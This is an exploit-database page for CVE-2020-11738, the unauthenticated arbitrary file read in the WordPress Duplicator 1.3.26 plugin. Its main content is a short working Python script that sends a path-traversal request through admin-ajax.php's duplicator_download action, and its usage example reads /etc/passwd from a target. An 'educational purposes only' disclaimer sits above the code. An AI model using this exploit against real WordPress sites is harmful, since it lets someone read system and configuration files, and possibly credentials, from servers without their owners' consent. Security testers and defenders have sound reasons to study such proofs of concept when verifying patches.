Wordpress plugin duplicator 1.3.26 unauthenticated arbitrary file read Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2021-10-18 | Type : webapps | Platform : php
This exploit / vulnerability Wordpress plugin duplicator 1.3.26 unauthenticated arbitrary file read is for educational purposes only and if it is used you will do on your own risk!


[+] Code ...

# Exploit Title: Wordpress Plugin Duplicator 1.3.26 - Unauthenticated Arbitrary File Read
# Date: October 16, 2021
# Exploit Author: nam3lum
# Vendor Homepage: https://wordpress.org/plugins/duplicator/
# Software Link: https://downloads.wordpress.org/plugin/duplicator.1.3.26.zip]
# Version: 1.3.26
# Tested on: Ubuntu 16.04
# CVE : CVE-2020-11738

import requests as re
import sys

if len(sys.argv) != 3:
print("Exploit made by nam3lum.")
print("Usage: CVE-2020-11738.py http://192.168.168.167 /etc/passwd")
exit()

arg = sys.argv[1]
file = sys.argv[2]

URL = arg + "/wp-admin/admin-ajax.php?action=duplicator_download&file=../../../../../../../../.." + file

output = re.get(url = URL)
print(output.text)